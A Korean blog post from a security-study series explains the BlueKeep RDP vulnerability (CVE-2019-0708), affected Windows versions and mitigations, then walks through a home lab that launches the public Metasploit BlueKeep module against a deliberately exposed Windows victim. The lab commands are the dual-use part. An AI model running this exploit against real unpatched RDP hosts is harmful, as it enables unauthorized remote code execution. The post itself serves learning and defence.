EASY7
CVE-2019-0708 RDP 취약점 BlueKeep 취약점 본문
BlueKeep 취약점
정상적인 사용자의 경우, RDP프로토콜을 사용할 때 Password를 입력해서 인증을 해야하지만, 취약점을 이용하면 특별히 정교하게 만든(specially crafted) request를 보내면 사용자 인증 과정 없이 바로 접속해서 모든 명령어를 사용할 수 있게 된다고 한다.
MS는 2019년 5월 22일에 긴급 보안 업데이트를 당부한다고 밝혔다. 2017년에 큰 피해가 발생하였던 워너크라이 랜섬웨어와 유사한 방식으로 취약한 PC에 악성코드가 전파가 가능하다.
<RDP 프로토콜>
(MS사의 Remote Desktop Protocol, 3389 port)
"원격 데스크탑 연결" 기능으로 Network상에서 하드디스크나 프린터를 공유하기 위해 주로 사용된다.
관련 CVE정보
CVE-2019-0708
취약한 윈도우 & 영향을 받지 않는 윈도우
<영향을 받는 제품>
윈도우 XP, 7
윈도우 서버 2003, 2008
<영향을 받지 않는 제품>
윈도우 10, 8.1, 8
윈도우 서버 2019, 2016, 2012 R2, 2012
보안 조치 방법
영향을 받지 않는 윈도우로 업데이트 하기
** 업데이트 하지 않고 보안 취약점 방지하는 법...
- 사용되는 3389/tcp 포트를 block하기
- 윈도우 7과 윈도우 서버 2008 사용자는 NLA(Network Level Authentication)기능을 enable시키면 된다.
NLA기능이 ON되어있으면 시스템에 등록된 account로 먼저 인증을 받아야하므로 공격을 방지할 수 있다.
실습
실습 환경
attacker 컴퓨터 : Kali
victim 컴퓨터 : Windows
네트워크 : 브릿지 모드
1. 메타스플로잇 실행
# msfdb init
# msfdb start
# msfconsole
# use windows/rdp/cve_2019_0708_bluekeep_rce
# set rhost 희생컴퓨터IP
2. victim 취약한 환경 만들기
2-1.방화벽에서 원격데스크톱(3389 port) 열기
2-2. 이 컴퓨터에 대한 원격 제어 허용하기
3. 취약한 환경인지 확인하기
3-1. window cmd 창에서 3389port 열려있는지 확인.
> netstat -anp tcp
3-2. kali에서 3389포트 열여있는지 포트 스캔
4. exploit!
>show targets
>set targets 1(7까지 다 테스트...)
**취약하지 않는 window 10에 실행한 경우.
**나중에 window 7을 깔게 되면 테스트해봐야겠다~
참고자료
MS 윈도우 보안 업데이트 받는 곳
https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
MS사에서 공지
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
키사에서 공지
취약한 시스템 스캔하는 PoC(Proof-of-Concept)
https://github.com/Ekultek/BlueKeep
-참고-
https://www.kisa.or.kr/notice/press_View.jsp?mode=view&p_No=8&b_No=8&d_No=1791
'보안 공부 > 취약점 실습' 카테고리의 다른 글
getAsynkeystate 함수를 이용한 KeyLogger 제작 (0) | 2020.06.10 |
---|---|
CVE-2015-0204 SSL/TLS 취약점 "Freak" (0) | 2020.06.10 |
path traversal을 통한 RCE (0) | 2019.09.26 |
CVE-2014-0160 OpenSSL heartbleed 하트블리드 취약점 (0) | 2019.09.22 |
ghost(CVE-2015-0235) (0) | 2019.09.10 |